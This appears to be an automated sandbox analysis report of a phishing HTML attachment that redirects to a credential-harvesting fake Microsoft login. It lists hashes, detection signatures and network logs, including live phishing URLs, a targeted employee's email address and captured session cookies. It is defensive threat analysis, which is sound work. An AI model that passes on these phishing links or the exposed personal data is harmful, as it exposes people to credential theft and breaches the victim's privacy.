Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Play Aud.html

Overview

General Information

Sample name:Play Aud.html
Analysis ID:1580042
MD5:2bb8b080bc5c05e7491f66c357b14c3c
SHA1:0d57678e477647e987088df6c9dafcb547fcf277
SHA256:b2fe7e7ba08e853e179077e9da9df90ef72fc4db3d22869ee60aabdeaf32e8b5
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
Suspicious Javascript code found in HTML file
IP address seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 2212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play Aud.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,1515091250345096605,12797661667219854330,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru/nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. The script's overall behavior is highly suspicious and poses a significant security risk.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and implementing a 'debugger trap' that redirects the user to a suspicious domain. These behaviors are highly indicative of malicious intent and are likely designed to hinder analysis and prevent user interaction.
Source: Play Aud.htmlHTTP Parser: Low number of body elements: 0
Source: Play Aud.htmlHTTP Parser: .location
Source: Play Aud.htmlHTTP Parser: .location
Source: Play Aud.htmlHTTP Parser: No favicon
Source: https://n6b.kolivane.ru/da4scmQ/#Mcaroline.vianna@globalfoundries.comHTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 104.21.65.72 104.21.65.72
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /da4scmQ/ HTTP/1.1Host: n6b.kolivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6a50df68a942a0&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: n6b.kolivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://n6b.kolivane.ru/da4scmQ/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlI1R25VOC9CSGRXZDRGb3ZJQndzM3c9PSIsInZhbHVlIjoiOWJrTkRYZVpZQzlhUGFBaXRneFdYWFNJK0wrOGJoSUhiaDlkVktoekNwcm41YVVtd2lJZk5hQ1loeFpsMU5rczM0UEdUN0RCMXZXM2xnVVJzenNweTM3VERFdFBFekVtZHhPQ1NtZFdCTFVLdDhSNDR2dTVRNnVwbldDc1U2NGIiLCJtYWMiOiI4M2Y3NWI3NWZhZTAzM2E5MTk3OTQzMTFlN2I0MjBkNDMzMWU4MWJjN2UyMmI0MWJmMzBjNGFlZjUxMTZlYjRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImN1bGl5MWhtdlJCc3BhWjR0aXVId0E9PSIsInZhbHVlIjoiMEgvRVVDYS9IbXhTVlVIUUlhUVkvUHZVRi96Tm9DUFVrY1IvcEVMZEh6TXh1eVFmSlRSMzFuT2lwVllwWGhHWWZJQzNocHpZbGRzZGtFVDZNWVplQ0NHYVdRSUMvSVJQVEdmbkgzVm9CQStmWWdMUWs3QUgvaGpPRDZKc2x0cTgiLCJtYWMiOiJhNGFiODIxYTllNzNkOGViYjhjZWNmNWMwYTEwN2FlM2RlOTczY2RhODVkZjZmNDQ2OThlNDUwNjYxZmNiOTJhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6a50df68a942a0&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7g HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7g HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f6a50df68a942a0/1734977510149/7a7c9221e414bb907990faf400801d9af55b752240b1e78d2b1126445bca29d8/zSGry-N1tCBz7IV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ HTTP/1.1Host: myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://n6b.kolivane.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://n6b.kolivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ HTTP/1.1Host: myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: n6b.kolivane.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: www.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3241sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 18:11:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 6980Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl4SCA2DgqObEAwkj5k9HaCD8EW8bHJ3xyOFNTqDT%2FNg9JQ%2Bor16T2JwBe9kyrBUbCv%2FLpc56GGESLnoFo1betBslpfCZl7rdJ2tZra7ks274WpHMjHVziqSc53KkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1357&rtt_var=779&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2126&delivery_rate=2098747&cwnd=252&unsent_bytes=0&cid=7f2833ac079263d0&ts=19&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8f6a50f5284cb9c5-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2560&min_rtt=2097&rtt_var=1117&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1895&delivery_rate=1392465&cwnd=141&unsent_bytes=0&cid=67fcde2775eb8cd1&ts=10413&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 18:11:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: oOMPL5WgXZJXEaHVofPqb3lqu0BUc6fKFW4=$qxMh8OwKyCjf5eS4cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f6a510e1bfe19a1-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 18:11:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 5i8mVd0nrzUUOfHvWqdarce2VAcCsH1h9RM=$osn2B7hgVhWjttAacache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f6a51378b370fa8-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 18:12:11 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 2Q+PRMCvEXayY0jHeLzuOuJUfG03rfg889g=$9gXEGOf+DnzeDr43cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f6a51816e685e78-EWRalt-svc: h3=":443"; ma=86400
Source: Play Aud.htmlString found in binary or memory: https://N6B.kolivane.ru/da4scmQ/#Mcaroline.vianna
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
